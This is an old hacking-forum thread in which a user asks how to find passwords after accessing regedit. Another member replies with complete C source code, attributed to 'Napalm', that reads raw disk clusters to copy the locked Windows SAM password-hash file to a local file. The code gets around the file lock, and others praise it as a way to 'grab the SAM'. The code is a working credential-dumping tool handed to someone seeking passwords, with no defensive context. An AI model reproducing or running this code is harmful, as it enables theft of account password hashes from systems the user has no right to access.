.

Regedit

<<

blck_kenzo

Newbie
Newbie

Posts: 2

Joined: Wed Aug 27, 2008 3:08 am

Post Wed Aug 27, 2008 5:12 am

Regedit

Hi everyone,
I don't know a method to find password after I access regedit.
Pls, help me. Thanks.
<<

shakuni

Jr. Member
Jr. Member

Posts: 80

Joined: Sun Nov 04, 2007 2:24 pm

Post Wed Aug 27, 2008 6:15 am

Re: Regedit

Use this-

  Code:
/*
Please try and read and understand this source code. You will learn somthing.

Sector  = 512 Bytes of disk space
Cluster = A Group of Sectors. This is different depending on your file
      system. But normally its 4Kb so thats 8 sectors.
VCN    = Virtual Cluster Number. Simply the index of the cluster within its context.
LCN    = Logical Cluster Number. The physical cluster index on containing media.
Extent    = The extent of a Cluster index.

The DirectCopy function invokes a Device Control Code to get the cluster information about a file.
We then loop though each resulting extent and copy each cluster to a new file.
*/

#define _WIN32_WINNT 0x0500
Not written by me, its by Napalm
#include <winioctl.h>

BOOL DirectCopy(LPSTR lpszSrc, LPSTR lpszDest)
{
    BOOL bResult = FALSE;
    HANDLE hSrc = CreateFile(lpszSrc, FILE_READ_ATTRIBUTES, (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE), NULL, OPEN_EXISTING, 0, 0);
    if(hSrc != INVALID_HANDLE_VALUE){
        CHAR szDrive[7]; wsprintf(szDrive, "%c:", *lpszSrc);
        DWORD dwSectorPerCluster, dwBytesPerSector;
        GetDiskFreeSpace(szDrive, &dwSectorPerCluster, &dwBytesPerSector, NULL, NULL);
        DWORD dwClusterSize = (dwBytesPerSector * dwSectorPerCluster);
        LARGE_INTEGER liFileSize; liFileSize.LowPart = GetFileSize(hSrc, (LPDWORD)&liFileSize.HighPart);
        DWORD dwClusters = (liFileSize.QuadPart / dwClusterSize);
        DWORD dwRead, dwWritten, dwPointsSize = sizeof(RETRIEVAL_POINTERS_BUFFER) + (dwClusters * (sizeof(LARGE_INTEGER) * 2));
        PRETRIEVAL_POINTERS_BUFFER pPoints = (PRETRIEVAL_POINTERS_BUFFER) new BYTE[dwPointsSize];
        STARTING_VCN_INPUT_BUFFER vcnStart = { 0 };
        if(DeviceIoControl(hSrc, FSCTL_GET_RETRIEVAL_POINTERS, &vcnStart, sizeof(vcnStart), pPoints, dwPointsSize, &dwWritten, NULL)){
            wsprintf(szDrive, "\\\\.\\%c:", *lpszSrc);
            HANDLE hDrive = CreateFile(szDrive, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0);
            if(hDrive != INVALID_HANDLE_VALUE){
                HANDLE hDest = CreateFile(lpszDest, GENERIC_WRITE, 0, NULL, CREATE_NEW, 0, 0);
                if(hDest != INVALID_HANDLE_VALUE){
                    SetFilePointer(hDest, liFileSize.LowPart, &liFileSize.HighPart, FILE_BEGIN);
                    SetEndOfFile(hDest);
                    LPBYTE lpCluster = new BYTE[dwClusterSize];
                    LARGE_INTEGER vcnPrev = pPoints->StartingVcn;
                    for(DWORD dwExtent = 0; dwExtent < pPoints->ExtentCount; dwExtent++){
                        DWORD dwLength = (DWORD)(pPoints->Extents[dwExtent].NextVcn.QuadPart - vcnPrev.QuadPart);
                        LARGE_INTEGER liSrcPos = { (pPoints->Extents[dwExtent].Lcn.QuadPart * dwClusterSize) };
                        LARGE_INTEGER liDstPos = { (vcnPrev.QuadPart * dwClusterSize) };
                        for(DWORD dwCluster = 0; dwCluster < dwLength; dwCluster++){
                            SetFilePointer(hDrive, liSrcPos.LowPart, &liSrcPos.HighPart, FILE_BEGIN);
                            ReadFile(hDrive, lpCluster, dwClusterSize, &dwRead, NULL);
                            SetFilePointer(hDest, liDstPos.LowPart, &liDstPos.HighPart, FILE_BEGIN);
                            WriteFile(hDest, lpCluster, dwRead, &dwWritten, NULL);
                            liSrcPos.QuadPart += dwClusterSize; liDstPos.QuadPart += dwClusterSize;
                        }
                        vcnPrev = pPoints->Extents[dwExtent].NextVcn;
                    }
                    delete lpCluster;
                    CloseHandle(hDest);
                    bResult = TRUE;
                }
                CloseHandle(hDrive);
            }
        }
        delete pPoints;
        CloseHandle(hSrc);
    }
    return bResult;
}

int main(int argc, char *argv[])
{
    CHAR szSAMFile[MAX_PATH + 12];
    GetSystemDirectory(szSAMFile, MAX_PATH);
    lstrcat(szSAMFile, "\\config\\SAM");
    return DirectCopy(szSAMFile, ".\\SAM.dat");

Not written by me, its by Napalm.
}


And if you wanna know other uses of this method, ask me 8)!
Last edited by shakuni on Wed Aug 27, 2008 6:17 am, edited 1 time in total.
There is no rule, law or tradition that apply universally... including this one.
<<

g00d_4sh

User avatar

Sr. Member
Sr. Member

Posts: 394

Joined: Tue Sep 18, 2007 1:50 pm

Location: Guayaquil, Ecuador

Post Wed Aug 27, 2008 11:49 am

Re: Regedit

Interesting way to grab the SAM. 
"Bad.. Good?  I'm the guy with the gun"
<<

blck_kenzo

Newbie
Newbie

Posts: 2

Joined: Wed Aug 27, 2008 3:08 am

Post Fri Aug 29, 2008 3:40 am

Re: Regedit

I try myself. Thanks for your help.

Return to Programming

Who is online

Users browsing this forum: No registered users and 2 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software